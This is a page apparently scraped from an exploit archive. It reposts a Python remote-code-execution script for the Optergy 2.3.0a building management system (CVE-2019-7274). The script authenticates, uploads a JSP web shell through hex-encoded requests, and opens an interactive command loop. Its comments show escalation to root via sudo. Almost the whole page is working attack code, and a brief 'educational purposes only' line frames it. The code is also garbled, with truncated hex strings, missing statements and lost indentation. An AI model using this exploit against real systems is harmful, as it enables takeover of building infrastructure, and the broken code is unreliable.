Optergy 2.3.0a remote code execution Vulnerability / Exploit

  /     /     /  

Exploits / Vulnerability Discovered : 2019-11-12 | Type : webapps | Platform : hardware
This exploit / vulnerability Optergy 2.3.0a remote code execution is for educational purposes only and if it is used you will do on your own risk!

[+] Code ...

# Title: Optergy 2.3.0a - Remote Code Execution
# Author: LiquidWorm
# Date: 2019-11-05
# Vendor: https://optergy.com/
# Product web page: https://optergy.com/products/
# Affected version: <=2.3.0a
# Advisory: https://applied-risk.com/resources/ar-2019-008
# Paper: https://applied-risk.com/resources/i-own-your-building-management-system
# CVE: CVE-2019-7274

#!/usr/bin/env python
# -*- coding: utf8 -*-
# lqwrm@metalgear:~/stuff/optergy$ python optergy_rfm.py
# [+] Usage: optergy_rfm.py http://IP
# [+] Example: optergy_rfm.py
# lqwrm@metalgear:~/stuff/optergy$ python optergy_rfm.py
# Enter username: podroom
# Enter password: podroom
# Welcome to Optergy HTTP Shell!
# You can navigate to:
# Or you can continue using this 'shell'.
# Type 'exit' for exit.
# root@ id
# uid=1000(optergy) gid=1000(optergy) groups=1000(optergy),4(adm)
# root@ sudo id
# uid=0(root) gid=0(root) groups=0(root)
# root@ rm /usr/local/tomcat/webapps/ROOT/images/jox.jsp
# root@ exit
# Have a nice day!

import requests
import sys,os,time,re

piton = os.path.basename(sys.argv[0])

if len(sys.argv) < 2:
print "[+] Usage: " + piton + " http://IP"
print "[+] Example: " + piton + "\n"

the_user = raw_input("Enter username: ")
the_pass = raw_input("Enter password: ")
the_host = sys.argv[1]
odi = requests.Session()

the_url = the_host + "/ajax/AjaxLogin.html?login"
the_headers = {"Accept" : "*/*",
"X-Requested-With" : "XMLHttpRequest",
"User-Agent" : "Noproblem/16.0",
"Content-Type" : "application/x-www-form-urlencoded",
"Accept-Encoding" : "gzip, deflate",
"Accept-Language" : "en-US,en;q=0.9"}

the_data = {"username" : the_user,
"password" : the_pass,
"token" : ''}

odi.post(the_url, headers = the_headers, data = the_data)

the_upl = ("\x2f\x61\x6a\x61\x78\x2f\x46\x69\x6c\x65\x55\x70\x6c\x6f\x61\x64"

the_url = the_host + the_upl
the_headers = {"Cache-Control" : "max-age=0",
"Content-Type" : "multipart/form-data; boundary=----WebKitFormBoundarysrMvKmQPYUODSWBl",
"User-Agent" : "Noproblem/16.0",
"Accept" : "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8",
"Accept-Encoding" : "gzip, deflate",
"Accept-Language" : "en-US,en;q=0.9"}

the_data = ("\x2d\x2d\x2d\x2d\x2d\x2d\x57\x65\x62\x4b\x69\x74\x46\x6f\x72\x6d"

odi.post(the_url, headers = the_headers, data = the_data)

print "\nWelcome to Optergy HTTP Shell!"
print "You can navigate to: " + the_host + "/images/jox.jsp"
print "Or you can continue using this 'shell'."
print "Type 'exit' for exit.\n"

while True:
cmd = raw_input("root@" + the_host[7:] + ":~# ")
if cmd.strip() == "exit":
print "Have a nice day!"
paramz = {"cmd" : cmd} # sudo cmd
shell = requests.get(url = the_host + "/images/jox.jsp", params = paramz)
regex = re.search(r"BR>(.*?)</pre>", shell.text, flags = re.S)
print regex.group(1).strip()
except Exception:
